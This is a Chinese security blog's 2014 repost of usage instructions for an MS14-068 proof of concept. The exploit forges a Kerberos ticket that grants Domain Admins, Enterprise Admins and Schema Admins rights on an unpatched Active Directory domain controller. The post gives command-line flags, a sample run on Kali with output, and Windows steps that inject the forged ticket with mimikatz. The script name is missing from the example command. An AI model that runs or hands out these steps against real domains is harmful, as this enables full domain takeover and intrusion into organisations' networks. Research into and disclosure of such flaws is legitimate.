MS14-068 privilege escalation PoC


Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

USAGE: -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> 

    -p <clearPassword> 
--rc4 <ntlmHash> 
Example usage : 

Linux (tested with samba and MIT Kerberos) 

root@kali:~/sploit/pykek# python -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows

python.exe -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

本文固定链接: | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2014年12月06日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: MS14-068 privilege escalation PoC | 90' s Blog|关注网络信息安全

MS14-068 privilege escalation PoC:等您坐沙发呢!


您必须 [ 登录 ] 才能发表留言!